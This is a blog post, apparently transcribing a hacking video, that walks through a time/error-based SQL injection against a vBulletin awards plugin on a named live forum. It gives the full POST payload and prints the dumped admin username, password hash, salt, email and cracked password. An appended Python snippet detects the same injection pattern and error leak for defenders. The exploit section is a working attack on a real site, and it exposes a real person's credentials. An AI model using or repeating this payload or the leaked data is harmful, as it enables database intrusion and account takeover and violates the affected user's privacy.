Tuesday, 3 December 2013

vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day

05:09






What things did I use?
1) Firefox
2) Hackbar addon
3) PasswordsPro for cracking
vBulletin Hash Type: md5(md5($salt).md5($pass))

Text In Video:
Code:
# Assalamu Alaikum and Hello everyone!
# In this video, I will be teaching you guys how to SQL inject into a vBulletin database through a vulnerable plugin called Yet Another Awards System.
# Many websites are using it. It will work on some sites.
# Lets Start :D# Target: http://fpsbunker.com/fodforums/# Vul Link: http://fpsbunker.com/fodforums/request_award.php# Click Load URLAnd Then Post:Post: do=submit&name=award_id=2 &award_request_reason=0&award_request_uid=0' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt,0x3a,email) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#&submit=Submit# and then hit Execute :DDatabase Error, Check its page source code
MySQL Error   : Duplicate entry 'day8249:cf9fc99e21a3bce77358713ffa0cb59c:P@H:ryan@fpsbunker.com~' for key 'group_key'# Username:day8249# Hash:cf9fc99e21a3bce77358713ffa0cb59c# Salt:P@H# Email:ryan@fpsbunker.com
Lets Crack the admin Hash :D
# Cracked Password:ryan03Admin password cracked and is ryan03Lets try


# Thanks for watching and I hope the video was easy to understand.
# More video tutorials can be found at www.MadLeets.com
# Video By Shadow008
# Greets to All MadLeeTs Team: www.MadLeets.com
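A defender-side check for the request and the database error quoted in the video text above, as an added example that is not part of the original post or of the plugin's code. The function names, the sample bodies (constructed, with a `<subquery>` placeholder) and the assumption that `award_id` and `award_request_uid` should only hold integers are mine.

```python
import re
from urllib.parse import parse_qsl

# Assumption: these request_award.php fields should only ever carry an integer id.
NUMERIC_PARAMS = ("award_id", "award_request_uid")
# Tokens typical of the error-based "Duplicate entry" technique seen in the post.
SQLI_TOKENS = re.compile(
    r"information_schema|floor\s*\(\s*rand\s*\(|group\s+by|\(\s*select\b|concat\s*\(",
    re.IGNORECASE)
# Response-side symptom: MySQL duplicate-key error echoing row data to the client.
LEAK_ERROR = re.compile(r"Duplicate entry '.*' for key '?<?group_key>?'?", re.IGNORECASE)

def inspect_request(path, body):
    """Return findings for one form-encoded POST; every repeated field is checked."""
    findings = []
    if not path.lower().endswith("/request_award.php"):
        return findings
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"\d{1,10}", value.strip()):
            findings.append(f"non-integer value in {name}")
        if SQLI_TOKENS.search(value):
            findings.append(f"SQL keywords in {name}")
    return findings

def response_leaks_data(html):
    """True when a page body contains the duplicate-key error used as a data channel."""
    return bool(LEAK_ERROR.search(html))

# Constructed samples; "<subquery>" is a placeholder, so the string is not a working query.
BENIGN_BODY = "do=submit&award_id=2&award_request_reason=Great+helper&award_request_uid=17&submit=Submit"
SUSPICIOUS_BODY = ("do=submit&award_id=2&award_request_reason=0&award_request_uid=0' and "
                   "(select 1 from (select count(*),concat(<subquery>,floor(rand(0)*2))x "
                   "from information_schema.tables group by x)a) AND ''='&submit=Submit")
ERROR_PAGE = "<!-- MySQL Error   : Duplicate entry 'EXAMPLE:VALUE~1' for key 'group_key' -->"

if __name__ == "__main__":
    for body in (BENIGN_BODY, SUSPICIOUS_BODY):
        print(inspect_request("/forums/request_award.php", body))
    print(response_leaks_data(ERROR_PAGE))
```

This only detects the pattern in logs or at a proxy; the fix belongs in the plugin, which has to treat `award_request_uid` as an integer before it reaches the query, and the forum should not print database errors into pages served to visitors.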




